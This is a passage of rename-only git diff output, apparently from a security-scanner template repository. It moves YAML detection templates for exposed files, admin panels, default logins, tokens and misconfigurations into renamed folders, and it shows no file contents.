 .../jira-unauthenticated-popular-filters.yaml                     | 0
 .../jira-unauthenticated-projects.yaml                            | 0
 .../jira-unauthenticated-user-picker.yaml                         | 0
 .../jupyter-ipython-unauth.yaml                                   | 0
 {security-misconfiguration => misconfiguration}/larvel-debug.yaml | 0
 .../manage-engine-ad-search.yaml                                  | 0
 .../put-method-enabled.yaml                                       | 0
 .../rack-mini-profiler.yaml                                       | 0
 .../salesforce-aura-misconfig.yaml                                | 0
 .../sidekiq-dashboard.yaml                                        | 0
 .../springboot-detect.yaml                                        | 0
 .../unauthenticated-airflow.yaml                                  | 0
 .../unauthenticated-jenkin-dashboard.yaml                         | 0
 .../unauthenticated-nacos-access.yaml                             | 0
 .../wamp-xdebug-detect.yaml                                       | 0
 .../wordpress-accessible-wpconfig.yaml                            | 0
 .../zenphoto-installation-sensitive-info.yaml                     | 0
 {subdomain-takeover => takeovers}/detect-all-takeovers.yaml       | 0
 {subdomain-takeover => takeovers}/s3-subtakeover.yaml             | 0
 163 files changed, 0 insertions(+), 0 deletions(-)
 rename {default-credentials => default-logins}/grafana-default-credential.yaml (100%)
 rename {default-credentials => default-logins}/rabbitmq-default-admin.yaml (100%)
 rename {default-credentials => default-logins}/solarwinds-default-admin.yaml (100%)
 rename {default-credentials => default-logins}/tomcat-manager-default.yaml (100%)
 rename {files => exposed-files}/apc-info.yaml (100%)
 rename {files => exposed-files}/cgi-test-page.yaml (100%)
 rename {files => exposed-files}/composer-config.yaml (100%)
 rename {files => exposed-files}/docker-registry.yaml (100%)
 rename {files => exposed-files}/domcfg-page.yaml (100%)
 rename {files => exposed-files}/druid-monitor.yaml (100%)
 rename {files => exposed-files}/drupal-install.yaml (100%)
 rename {files => exposed-files}/ds_store.yaml (100%)
 rename {files => exposed-files}/elasticsearch.yaml (100%)
 rename {files => exposed-files}/elmah-log-file.yaml (100%)
 rename {files => exposed-files}/error-logs.yaml (100%)
 rename {files => exposed-files}/exposed-kibana.yaml (100%)
 rename {files => exposed-files}/exposed-svn.yaml (100%)
 rename {files => exposed-files}/filezilla.yaml (100%)
 rename {files => exposed-files}/firebase-detect.yaml (100%)
 rename {files => exposed-files}/git-config.yaml (100%)
 rename {files => exposed-files}/graylog-api-browser.yaml (100%)
 rename {files => exposed-files}/htpasswd-detection.yaml (100%)
 rename {files => exposed-files}/jkstatus-manager.yaml (100%)
 rename {files => exposed-files}/jolokia.yaml (100%)
 rename {files => exposed-files}/laravel-env.yaml (100%)
 rename {files => exposed-files}/lazy-file.yaml (100%)
 rename {files => exposed-files}/magento-config.yaml (100%)
 rename {files => exposed-files}/owncloud-config.yaml (100%)
 rename {files => exposed-files}/package-json.yaml (100%)
 rename {files => exposed-files}/php-errors.yaml (100%)
 rename {files => exposed-files}/phpinfo.yaml (100%)
 rename {files => exposed-files}/public-tomcat-instance.yaml (100%)
 rename {files => exposed-files}/redmine-db-config.yaml (100%)
 rename {files => exposed-files}/server-private-keys.yaml (100%)
 rename {files => exposed-files}/server-status-localhost.yaml (100%)
 rename {files => exposed-files}/shell-history.yaml (100%)
 rename {files => exposed-files}/sql-dump.yaml (100%)
 rename {files => exposed-files}/syfmony-profiler.yaml (100%)
 rename {files => exposed-files}/telerik-dialoghandler-detect.yaml (100%)
 rename {files => exposed-files}/telerik-fileupload-detect.yaml (100%)
 rename {files => exposed-files}/tomcat-scripts.yaml (100%)
 rename {files => exposed-files}/trace-axd-detect.yaml (100%)
 rename {files => exposed-files}/wadl-files.yaml (100%)
 rename {files => exposed-files}/web-config.yaml (100%)
 rename {files => exposed-files}/wordpress-db-backup.yaml (100%)
 rename {files => exposed-files}/wordpress-debug-log.yaml (100%)
 rename {files => exposed-files}/wordpress-directory-listing.yaml (100%)
 rename {files => exposed-files}/wordpress-emergency-script.yaml (100%)
 rename {files => exposed-files}/wordpress-installer-log.yaml (100%)
 rename {files => exposed-files}/wordpress-tmm-db-migrate.yaml (100%)
 rename {files => exposed-files}/wordpress-user-enumeration.yaml (100%)
 rename {files => exposed-files}/wsdl-detect.yaml (100%)
 rename {files => exposed-files}/xprober-service.yaml (100%)
 rename {files => exposed-files}/zip-backup-files.yaml (100%)
 rename {panels => exposed-panels}/adminer-panel.yaml (100%)
 rename {panels => exposed-panels}/aims-password-mgmt-client.yaml (100%)
 rename {panels => exposed-panels}/atlassian-crowd-panel.yaml (100%)
 rename {panels => exposed-panels}/cisco-asa-panel.yaml (100%)
 rename {panels => exposed-panels}/citrix-adc-gateway-detect.yaml (100%)
 rename {panels => exposed-panels}/citrix-vpn-detect.yaml (100%)
 rename {panels => exposed-panels}/compal.yaml (100%)
 rename {panels => exposed-panels}/crxde.yaml (100%)
 rename {panels => exposed-panels}/docker-api.yaml (100%)
 rename {panels => exposed-panels}/fortinet-fortigate-panel.yaml (100%)
 rename {panels => exposed-panels}/fortiweb-panel.yaml (100%)
 rename {panels => exposed-panels}/github-enterprise-detect.yaml (100%)
 rename {panels => exposed-panels}/gitlab-detect.yaml (100%)
 rename {panels => exposed-panels}/globalprotect-panel.yaml (100%)
 rename {panels => exposed-panels}/go-anywhere-client.yaml (100%)
 rename {panels => exposed-panels}/grafana-detect.yaml (100%)
 rename {panels => exposed-panels}/identityguard-selfservice-entrust.yaml (100%)
 rename {panels => exposed-panels}/iomega-lenovo-emc-shared-nas-detect.yaml (100%)
 rename {panels => exposed-panels}/jenkins-asyncpeople.yaml (100%)
 rename {panels => exposed-panels}/jmx-console.yaml (100%)
 rename {panels => exposed-panels}/kubernetes-pods.yaml (100%)
 rename {panels => exposed-panels}/manage-engine-admanager-panel.yaml (100%)
 rename {panels => exposed-panels}/mobileiron-login.yaml (100%)
 rename {panels => exposed-panels}/netscaler-gateway.yaml (100%)
 rename {panels => exposed-panels}/network-camera-detect.yaml (100%)
 rename {panels => exposed-panels}/oipm-detect.yaml (100%)
 rename {panels => exposed-panels}/parallels-html-client.yaml (100%)
 rename {panels => exposed-panels}/phpmyadmin-panel.yaml (100%)
 rename {panels => exposed-panels}/polycom-admin-detect.yaml (100%)
 rename {panels => exposed-panels}/pulse-secure-panel.yaml (100%)
 rename {panels => exposed-panels}/rabbitmq-dashboard.yaml (100%)
 rename {panels => exposed-panels}/rsa-self-service.yaml (100%)
 rename {panels => exposed-panels}/sap-hana-xsengine-panel.yaml (100%)
 rename {panels => exposed-panels}/sap-netweaver-detect.yaml (100%)
 rename {panels => exposed-panels}/sap-recon-detect.yaml (100%)
 rename {panels => exposed-panels}/solarwinds-orion.yaml (100%)
 rename {panels => exposed-panels}/sonarqube-login.yaml (100%)
 rename {panels => exposed-panels}/sonicwall-management-panel.yaml (100%)
 rename {panels => exposed-panels}/sonicwall-sslvpn-panel.yaml (100%)
 rename {panels => exposed-panels}/sophos-fw-version-detect.yaml (100%)
 rename {panels => exposed-panels}/supervpn-panel.yaml (100%)
 rename {panels => exposed-panels}/swagger-panel.yaml (100%)
 rename {panels => exposed-panels}/tikiwiki-cms.yaml (100%)
 rename {panels => exposed-panels}/traefik-dashboard.yaml (100%)
 rename {panels => exposed-panels}/virtual-ema-detect.yaml (100%)
 rename {panels => exposed-panels}/weave-scope-dashboard-detect.yaml (100%)
 rename {panels => exposed-panels}/webeditors.yaml (100%)
 rename {panels => exposed-panels}/webmin-panel.yaml (100%)
 rename {panels => exposed-panels}/workspace-one-uem.yaml (100%)
 rename {panels => exposed-panels}/workspaceone-uem-airwatch-dashboard-detect.yaml (100%)
 rename {tokens => exposed-tokens/tokens}/amazon-mws-auth-token-value.yaml (100%)
 rename {tokens => exposed-tokens/tokens}/aws-access-key-value.yaml (100%)
 rename {tokens => exposed-tokens/tokens}/credentials-disclosure.yaml (100%)
 rename {tokens => exposed-tokens/tokens}/fcm-server-key.yaml (100%)
 rename {tokens => exposed-tokens/tokens}/google-api-key.yaml (100%)
 rename {tokens => exposed-tokens/tokens}/http-username-password.yaml (100%)
 rename {tokens => exposed-tokens/tokens}/mailchimp-api-key.yaml (100%)
 rename {tokens => exposed-tokens/tokens}/slack-access-token.yaml (100%)
 rename {payloads => helpers/payloads}/CVE-2020-5776.csv (100%)
 rename {payloads => helpers/payloads}/CVE-2020-6287.xml (100%)
 rename {wordlists => helpers/wordlists}/wp-plugins.txt (100%)
 rename {misc => miscellaneous}/basic-cors-flash.yaml (100%)
 rename {misc => miscellaneous}/dir-listing.yaml (100%)
 rename {misc => miscellaneous}/htaccess-config.yaml (100%)
 rename {misc => miscellaneous}/missing-csp.yaml (100%)
 rename {misc => miscellaneous}/missing-hsts.yaml (100%)
 rename {misc => miscellaneous}/missing-x-frame-options.yaml (100%)
 rename {misc => miscellaneous}/ntlm-directories.yaml (100%)
 rename {misc => miscellaneous}/old-copyright.yaml (100%)
 rename {misc => miscellaneous}/robots.txt.yaml (100%)
 rename {misc => miscellaneous}/security.txt.yaml (100%)
 rename {misc => miscellaneous}/trace-method.yaml (100%)
 rename {misc => miscellaneous}/unencrypted-bigip-ltm-cookie.yaml (100%)
 rename {misc => miscellaneous}/wp-xmlrpc.yaml (100%)
 rename {misc => miscellaneous}/xml-schema-detect.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/aem-groovyconsole.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/apache-tomcat-snoop.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/aspx-debug-mode.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/basic-cors.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/django-debug-detect.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/drupal-user-enum-ajax.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/drupal-user-enum-redirect.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/exposed-service-now.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/front-page-misconfig.yaml (100%)
 rename {generic-detections => misconfiguration/generic-detections}/basic-xss-prober.yaml (100%)
 rename {generic-detections => misconfiguration/generic-detections}/general-tokens.yaml (100%)
 rename {generic-detections => misconfiguration/generic-detections}/top-15-xss.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/jenkins-stack-trace.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/jira-service-desk-signup.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/jira-unauthenticated-dashboards.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/jira-unauthenticated-popular-filters.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/jira-unauthenticated-projects.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/jira-unauthenticated-user-picker.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/jupyter-ipython-unauth.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/larvel-debug.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/manage-engine-ad-search.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/put-method-enabled.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/rack-mini-profiler.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/salesforce-aura-misconfig.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/sidekiq-dashboard.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/springboot-detect.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/unauthenticated-airflow.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/unauthenticated-jenkin-dashboard.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/unauthenticated-nacos-access.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/wamp-xdebug-detect.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/wordpress-accessible-wpconfig.yaml (100%)
 rename {security-misconfiguration => misconfiguration}/zenphoto-installation-sensitive-info.yaml (100%)
 rename {subdomain-takeover => takeovers}/detect-all-takeovers.yaml (100%)
 rename {subdomain-takeover => takeovers}/s3-subtakeover.yaml (100%)

diff --git a/default-credentials/grafana-default-credential.yaml b/default-logins/grafana-default-credential.yaml
similarity index 100%
rename from default-credentials/grafana-default-credential.yaml
rename to default-logins/grafana-default-credential.yaml
diff --git a/default-credentials/rabbitmq-default-admin.yaml b/default-logins/rabbitmq-default-admin.yaml
similarity index 100%
rename from default-credentials/rabbitmq-default-admin.yaml
rename to default-logins/rabbitmq-default-admin.yaml
diff --git a/default-credentials/solarwinds-default-admin.yaml b/default-logins/solarwinds-default-admin.yaml
similarity index 100%
rename from default-credentials/solarwinds-default-admin.yaml
rename to default-logins/solarwinds-default-admin.yaml
diff --git a/default-credentials/tomcat-manager-default.yaml b/default-logins/tomcat-manager-default.yaml
similarity index 100%
rename from default-credentials/tomcat-manager-default.yaml
rename to default-logins/tomcat-manager-default.yaml
diff --git a/files/apc-info.yaml b/exposed-files/apc-info.yaml
similarity index 100%
rename from files/apc-info.yaml
rename to exposed-files/apc-info.yaml
diff --git a/files/cgi-test-page.yaml b/exposed-files/cgi-test-page.yaml
similarity index 100%
rename from files/cgi-test-page.yaml
rename to exposed-files/cgi-test-page.yaml
diff --git a/files/composer-config.yaml b/exposed-files/composer-config.yaml
similarity index 100%
rename from files/composer-config.yaml
rename to exposed-files/composer-config.yaml
diff --git a/files/docker-registry.yaml b/exposed-files/docker-registry.yaml
similarity index 100%
rename from files/docker-registry.yaml
rename to exposed-files/docker-registry.yaml
diff --git a/files/domcfg-page.yaml b/exposed-files/domcfg-page.yaml
similarity index 100%
rename from files/domcfg-page.yaml
rename to exposed-files/domcfg-page.yaml
diff --git a/files/druid-monitor.yaml b/exposed-files/druid-monitor.yaml
similarity index 100%
rename from files/druid-monitor.yaml
rename to exposed-files/druid-monitor.yaml
diff --git a/files/drupal-install.yaml b/exposed-files/drupal-install.yaml
similarity index 100%
rename from files/drupal-install.yaml
rename to exposed-files/drupal-install.yaml
diff --git a/files/ds_store.yaml b/exposed-files/ds_store.yaml
similarity index 100%
rename from files/ds_store.yaml
rename to exposed-files/ds_store.yaml
diff --git a/files/elasticsearch.yaml b/exposed-files/elasticsearch.yaml
similarity index 100%
rename from files/elasticsearch.yaml
rename to exposed-files/elasticsearch.yaml
diff --git a/files/elmah-log-file.yaml b/exposed-files/elmah-log-file.yaml
similarity index 100%
rename from files/elmah-log-file.yaml
rename to exposed-files/elmah-log-file.yaml
diff --git a/files/error-logs.yaml b/exposed-files/error-logs.yaml
similarity index 100%
rename from files/error-logs.yaml
rename to exposed-files/error-logs.yaml
diff --git a/files/exposed-kibana.yaml b/exposed-files/exposed-kibana.yaml
similarity index 100%
rename from files/exposed-kibana.yaml
rename to exposed-files/exposed-kibana.yaml
diff --git a/files/exposed-svn.yaml b/exposed-files/exposed-svn.yaml
similarity index 100%
rename from files/exposed-svn.yaml
rename to exposed-files/exposed-svn.yaml
diff --git a/files/filezilla.yaml b/exposed-files/filezilla.yaml
similarity index 100%
rename from files/filezilla.yaml
rename to exposed-files/filezilla.yaml
diff --git a/files/firebase-detect.yaml b/exposed-files/firebase-detect.yaml
similarity index 100%
rename from files/firebase-detect.yaml
rename to exposed-files/firebase-detect.yaml
diff --git a/files/git-config.yaml b/exposed-files/git-config.yaml
similarity index 100%
rename from files/git-config.yaml
rename to exposed-files/git-config.yaml
diff --git a/files/graylog-api-browser.yaml b/exposed-files/graylog-api-browser.yaml
similarity index 100%
rename from files/graylog-api-browser.yaml
rename to exposed-files/graylog-api-browser.yaml
diff --git a/files/htpasswd-detection.yaml b/exposed-files/htpasswd-detection.yaml
similarity index 100%
rename from files/htpasswd-detection.yaml
rename to exposed-files/htpasswd-detection.yaml
diff --git a/files/jkstatus-manager.yaml b/exposed-files/jkstatus-manager.yaml
similarity index 100%
rename from files/jkstatus-manager.yaml
rename to exposed-files/jkstatus-manager.yaml
diff --git a/files/jolokia.yaml b/exposed-files/jolokia.yaml
similarity index 100%
rename from files/jolokia.yaml
rename to exposed-files/jolokia.yaml
diff --git a/files/laravel-env.yaml b/exposed-files/laravel-env.yaml
similarity index 100%
rename from files/laravel-env.yaml
rename to exposed-files/laravel-env.yaml
diff --git a/files/lazy-file.yaml b/exposed-files/lazy-file.yaml
similarity index 100%
rename from files/lazy-file.yaml
rename to exposed-files/lazy-file.yaml
diff --git a/files/magento-config.yaml b/exposed-files/magento-config.yaml
similarity index 100%
rename from files/magento-config.yaml
rename to exposed-files/magento-config.yaml
diff --git a/files/owncloud-config.yaml b/exposed-files/owncloud-config.yaml
similarity index 100%
rename from files/owncloud-config.yaml
rename to exposed-files/owncloud-config.yaml
diff --git a/files/package-json.yaml b/exposed-files/package-json.yaml
similarity index 100%
rename from files/package-json.yaml
rename to exposed-files/package-json.yaml
diff --git a/files/php-errors.yaml b/exposed-files/php-errors.yaml
similarity index 100%
rename from files/php-errors.yaml
rename to exposed-files/php-errors.yaml
diff --git a/files/phpinfo.yaml b/exposed-files/phpinfo.yaml
similarity index 100%
rename from files/phpinfo.yaml
rename to exposed-files/phpinfo.yaml
diff --git a/files/public-tomcat-instance.yaml b/exposed-files/public-tomcat-instance.yaml
similarity index 100%
rename from files/public-tomcat-instance.yaml
rename to exposed-files/public-tomcat-instance.yaml
diff --git a/files/redmine-db-config.yaml b/exposed-files/redmine-db-config.yaml
similarity index 100%
rename from files/redmine-db-config.yaml
rename to exposed-files/redmine-db-config.yaml
diff --git a/files/server-private-keys.yaml b/exposed-files/server-private-keys.yaml
similarity index 100%
rename from files/server-private-keys.yaml
rename to exposed-files/server-private-keys.yaml
diff --git a/files/server-status-localhost.yaml b/exposed-files/server-status-localhost.yaml
similarity index 100%
rename from files/server-status-localhost.yaml
rename to exposed-files/server-status-localhost.yaml
diff --git a/files/shell-history.yaml b/exposed-files/shell-history.yaml
similarity index 100%
rename from files/shell-history.yaml
rename to exposed-files/shell-history.yaml
diff --git a/files/sql-dump.yaml b/exposed-files/sql-dump.yaml
similarity index 100%
rename from files/sql-dump.yaml
rename to exposed-files/sql-dump.yaml
diff --git a/files/syfmony-profiler.yaml b/exposed-files/syfmony-profiler.yaml
similarity index 100%
rename from files/syfmony-profiler.yaml
rename to exposed-files/syfmony-profiler.yaml
diff --git a/files/telerik-dialoghandler-detect.yaml b/exposed-files/telerik-dialoghandler-detect.yaml
similarity index 100%
rename from files/telerik-dialoghandler-detect.yaml
rename to exposed-files/telerik-dialoghandler-detect.yaml
diff --git a/files/telerik-fileupload-detect.yaml b/exposed-files/telerik-fileupload-detect.yaml
similarity index 100%
rename from files/telerik-fileupload-detect.yaml
rename to exposed-files/telerik-fileupload-detect.yaml
diff --git a/files/tomcat-scripts.yaml b/exposed-files/tomcat-scripts.yaml
similarity index 100%
rename from files/tomcat-scripts.yaml
rename to exposed-files/tomcat-scripts.yaml
diff --git a/files/trace-axd-detect.yaml b/exposed-files/trace-axd-detect.yaml
similarity index 100%
rename from files/trace-axd-detect.yaml
rename to exposed-files/trace-axd-detect.yaml
diff --git a/files/wadl-files.yaml b/exposed-files/wadl-files.yaml
similarity index 100%
rename from files/wadl-files.yaml
rename to exposed-files/wadl-files.yaml
diff --git a/files/web-config.yaml b/exposed-files/web-config.yaml
similarity index 100%
rename from files/web-config.yaml
rename to exposed-files/web-config.yaml
diff --git a/files/wordpress-db-backup.yaml b/exposed-files/wordpress-db-backup.yaml
similarity index 100%
rename from files/wordpress-db-backup.yaml
rename to exposed-files/wordpress-db-backup.yaml
diff --git a/files/wordpress-debug-log.yaml b/exposed-files/wordpress-debug-log.yaml
similarity index 100%
rename from files/wordpress-debug-log.yaml
rename to exposed-files/wordpress-debug-log.yaml
diff --git a/files/wordpress-directory-listing.yaml b/exposed-files/wordpress-directory-listing.yaml
similarity index 100%
rename from files/wordpress-directory-listing.yaml
rename to exposed-files/wordpress-directory-listing.yaml
diff --git a/files/wordpress-emergency-script.yaml b/exposed-files/wordpress-emergency-script.yaml
similarity index 100%
rename from files/wordpress-emergency-script.yaml
rename to exposed-files/wordpress-emergency-script.yaml
diff --git a/files/wordpress-installer-log.yaml b/exposed-files/wordpress-installer-log.yaml
similarity index 100%
rename from files/wordpress-installer-log.yaml
rename to exposed-files/wordpress-installer-log.yaml
diff --git a/files/wordpress-tmm-db-migrate.yaml b/exposed-files/wordpress-tmm-db-migrate.yaml
similarity index 100%
rename from files/wordpress-tmm-db-migrate.yaml
rename to exposed-files/wordpress-tmm-db-migrate.yaml
diff --git a/files/wordpress-user-enumeration.yaml b/exposed-files/wordpress-user-enumeration.yaml
similarity index 100%
rename from files/wordpress-user-enumeration.yaml
rename to exposed-files/wordpress-user-enumeration.yaml
diff --git a/files/wsdl-detect.yaml b/exposed-files/wsdl-detect.yaml
similarity index 100%
rename from files/wsdl-detect.yaml
rename to exposed-files/wsdl-detect.yaml
diff --git a/files/xprober-service.yaml b/exposed-files/xprober-service.yaml
similarity index 100%
rename from files/xprober-service.yaml
rename to exposed-files/xprober-service.yaml
diff --git a/files/zip-backup-files.yaml b/exposed-files/zip-backup-files.yaml
similarity index 100%
rename from files/zip-backup-files.yaml
rename to exposed-files/zip-backup-files.yaml
diff --git a/panels/adminer-panel.yaml b/exposed-panels/adminer-panel.yaml
similarity index 100%
rename from panels/adminer-panel.yaml
rename to exposed-panels/adminer-panel.yaml
diff --git a/panels/aims-password-mgmt-client.yaml b/exposed-panels/aims-password-mgmt-client.yaml
similarity index 100%
rename from panels/aims-password-mgmt-client.yaml
rename to exposed-panels/aims-password-mgmt-client.yaml
diff --git a/panels/atlassian-crowd-panel.yaml b/exposed-panels/atlassian-crowd-panel.yaml
similarity index 100%
rename from panels/atlassian-crowd-panel.yaml
rename to exposed-panels/atlassian-crowd-panel.yaml
diff --git a/panels/cisco-asa-panel.yaml b/exposed-panels/cisco-asa-panel.yaml
similarity index 100%
rename from panels/cisco-asa-panel.yaml
rename to exposed-panels/cisco-asa-panel.yaml
diff --git a/panels/citrix-adc-gateway-detect.yaml b/exposed-panels/citrix-adc-gateway-detect.yaml
similarity index 100%
rename from panels/citrix-adc-gateway-detect.yaml
rename to exposed-panels/citrix-adc-gateway-detect.yaml
diff --git a/panels/citrix-vpn-detect.yaml b/exposed-panels/citrix-vpn-detect.yaml
similarity index 100%
rename from panels/citrix-vpn-detect.yaml
rename to exposed-panels/citrix-vpn-detect.yaml
diff --git a/panels/compal.yaml b/exposed-panels/compal.yaml
similarity index 100%
rename from panels/compal.yaml
rename to exposed-panels/compal.yaml
diff --git a/panels/crxde.yaml b/exposed-panels/crxde.yaml
similarity index 100%
rename from panels/crxde.yaml
rename to exposed-panels/crxde.yaml
diff --git a/panels/docker-api.yaml b/exposed-panels/docker-api.yaml
similarity index 100%
rename from panels/docker-api.yaml
rename to exposed-panels/docker-api.yaml
diff --git a/panels/fortinet-fortigate-panel.yaml b/exposed-panels/fortinet-fortigate-panel.yaml
similarity index 100%
rename from panels/fortinet-fortigate-panel.yaml
rename to exposed-panels/fortinet-fortigate-panel.yaml
diff --git a/panels/fortiweb-panel.yaml b/exposed-panels/fortiweb-panel.yaml
similarity index 100%
rename from panels/fortiweb-panel.yaml
rename to exposed-panels/fortiweb-panel.yaml
diff --git a/panels/github-enterprise-detect.yaml b/exposed-panels/github-enterprise-detect.yaml
similarity index 100%
rename from panels/github-enterprise-detect.yaml
rename to exposed-panels/github-enterprise-detect.yaml
diff --git a/panels/gitlab-detect.yaml b/exposed-panels/gitlab-detect.yaml
similarity index 100%
rename from panels/gitlab-detect.yaml
rename to exposed-panels/gitlab-detect.yaml
diff --git a/panels/globalprotect-panel.yaml b/exposed-panels/globalprotect-panel.yaml
similarity index 100%
rename from panels/globalprotect-panel.yaml
rename to exposed-panels/globalprotect-panel.yaml
diff --git a/panels/go-anywhere-client.yaml b/exposed-panels/go-anywhere-client.yaml
similarity index 100%
rename from panels/go-anywhere-client.yaml
rename to exposed-panels/go-anywhere-client.yaml
diff --git a/panels/grafana-detect.yaml b/exposed-panels/grafana-detect.yaml
similarity index 100%
rename from panels/grafana-detect.yaml
rename to exposed-panels/grafana-detect.yaml
diff --git a/panels/identityguard-selfservice-entrust.yaml b/exposed-panels/identityguard-selfservice-entrust.yaml
similarity index 100%
rename from panels/identityguard-selfservice-entrust.yaml
rename to exposed-panels/identityguard-selfservice-entrust.yaml
diff --git a/panels/iomega-lenovo-emc-shared-nas-detect.yaml b/exposed-panels/iomega-lenovo-emc-shared-nas-detect.yaml
similarity index 100%
rename from panels/iomega-lenovo-emc-shared-nas-detect.yaml
rename to exposed-panels/iomega-lenovo-emc-shared-nas-detect.yaml
diff --git a/panels/jenkins-asyncpeople.yaml b/exposed-panels/jenkins-asyncpeople.yaml
similarity index 100%
rename from panels/jenkins-asyncpeople.yaml
rename to exposed-panels/jenkins-asyncpeople.yaml
diff --git a/panels/jmx-console.yaml b/exposed-panels/jmx-console.yaml
similarity index 100%
rename from panels/jmx-console.yaml
rename to exposed-panels/jmx-console.yaml
diff --git a/panels/kubernetes-pods.yaml b/exposed-panels/kubernetes-pods.yaml
similarity index 100%
rename from panels/kubernetes-pods.yaml
rename to exposed-panels/kubernetes-pods.yaml
diff --git a/panels/manage-engine-admanager-panel.yaml b/exposed-panels/manage-engine-admanager-panel.yaml
similarity index 100%
rename from panels/manage-engine-admanager-panel.yaml
rename to exposed-panels/manage-engine-admanager-panel.yaml
diff --git a/panels/mobileiron-login.yaml b/exposed-panels/mobileiron-login.yaml
similarity index 100%
rename from panels/mobileiron-login.yaml
rename to exposed-panels/mobileiron-login.yaml
diff --git a/panels/netscaler-gateway.yaml b/exposed-panels/netscaler-gateway.yaml
similarity index 100%
rename from panels/netscaler-gateway.yaml
rename to exposed-panels/netscaler-gateway.yaml
diff --git a/panels/network-camera-detect.yaml b/exposed-panels/network-camera-detect.yaml
similarity index 100%
rename from panels/network-camera-detect.yaml
rename to exposed-panels/network-camera-detect.yaml
diff --git a/panels/oipm-detect.yaml b/exposed-panels/oipm-detect.yaml
similarity index 100%
rename from panels/oipm-detect.yaml
rename to exposed-panels/oipm-detect.yaml
diff --git a/panels/parallels-html-client.yaml b/exposed-panels/parallels-html-client.yaml
similarity index 100%
rename from panels/parallels-html-client.yaml
rename to exposed-panels/parallels-html-client.yaml
diff --git a/panels/phpmyadmin-panel.yaml b/exposed-panels/phpmyadmin-panel.yaml
similarity index 100%
rename from panels/phpmyadmin-panel.yaml
rename to exposed-panels/phpmyadmin-panel.yaml
diff --git a/panels/polycom-admin-detect.yaml b/exposed-panels/polycom-admin-detect.yaml
similarity index 100%
rename from panels/polycom-admin-detect.yaml
rename to exposed-panels/polycom-admin-detect.yaml
diff --git a/panels/pulse-secure-panel.yaml b/exposed-panels/pulse-secure-panel.yaml
similarity index 100%
rename from panels/pulse-secure-panel.yaml
rename to exposed-panels/pulse-secure-panel.yaml
diff --git a/panels/rabbitmq-dashboard.yaml b/exposed-panels/rabbitmq-dashboard.yaml
similarity index 100%
rename from panels/rabbitmq-dashboard.yaml
rename to exposed-panels/rabbitmq-dashboard.yaml
diff --git a/panels/rsa-self-service.yaml b/exposed-panels/rsa-self-service.yaml
similarity index 100%
rename from panels/rsa-self-service.yaml
rename to exposed-panels/rsa-self-service.yaml
diff --git a/panels/sap-hana-xsengine-panel.yaml b/exposed-panels/sap-hana-xsengine-panel.yaml
similarity index 100%
rename from panels/sap-hana-xsengine-panel.yaml
rename to exposed-panels/sap-hana-xsengine-panel.yaml
diff --git a/panels/sap-netweaver-detect.yaml b/exposed-panels/sap-netweaver-detect.yaml
similarity index 100%
rename from panels/sap-netweaver-detect.yaml
rename to exposed-panels/sap-netweaver-detect.yaml
diff --git a/panels/sap-recon-detect.yaml b/exposed-panels/sap-recon-detect.yaml
similarity index 100%
rename from panels/sap-recon-detect.yaml
rename to exposed-panels/sap-recon-detect.yaml
diff --git a/panels/solarwinds-orion.yaml b/exposed-panels/solarwinds-orion.yaml
similarity index 100%
rename from panels/solarwinds-orion.yaml
rename to exposed-panels/solarwinds-orion.yaml
diff --git a/panels/sonarqube-login.yaml b/exposed-panels/sonarqube-login.yaml
similarity index 100%
rename from panels/sonarqube-login.yaml
rename to exposed-panels/sonarqube-login.yaml
diff --git a/panels/sonicwall-management-panel.yaml b/exposed-panels/sonicwall-management-panel.yaml
similarity index 100%
rename from panels/sonicwall-management-panel.yaml
rename to exposed-panels/sonicwall-management-panel.yaml
diff --git a/panels/sonicwall-sslvpn-panel.yaml b/exposed-panels/sonicwall-sslvpn-panel.yaml
similarity index 100%
rename from panels/sonicwall-sslvpn-panel.yaml
rename to exposed-panels/sonicwall-sslvpn-panel.yaml
diff --git a/panels/sophos-fw-version-detect.yaml b/exposed-panels/sophos-fw-version-detect.yaml
similarity index 100%
rename from panels/sophos-fw-version-detect.yaml
rename to exposed-panels/sophos-fw-version-detect.yaml
diff --git a/panels/supervpn-panel.yaml b/exposed-panels/supervpn-panel.yaml
similarity index 100%
rename from panels/supervpn-panel.yaml
rename to exposed-panels/supervpn-panel.yaml
diff --git a/panels/swagger-panel.yaml b/exposed-panels/swagger-panel.yaml
similarity index 100%
rename from panels/swagger-panel.yaml
rename to exposed-panels/swagger-panel.yaml
diff --git a/panels/tikiwiki-cms.yaml b/exposed-panels/tikiwiki-cms.yaml
similarity index 100%
rename from panels/tikiwiki-cms.yaml
rename to exposed-panels/tikiwiki-cms.yaml
diff --git a/panels/traefik-dashboard.yaml b/exposed-panels/traefik-dashboard.yaml
similarity index 100%
rename from panels/traefik-dashboard.yaml
rename to exposed-panels/traefik-dashboard.yaml
diff --git a/panels/virtual-ema-detect.yaml b/exposed-panels/virtual-ema-detect.yaml
similarity index 100%
rename from panels/virtual-ema-detect.yaml
rename to exposed-panels/virtual-ema-detect.yaml
diff --git a/panels/weave-scope-dashboard-detect.yaml b/exposed-panels/weave-scope-dashboard-detect.yaml
similarity index 100%
rename from panels/weave-scope-dashboard-detect.yaml
rename to exposed-panels/weave-scope-dashboard-detect.yaml
diff --git a/panels/webeditors.yaml b/exposed-panels/webeditors.yaml
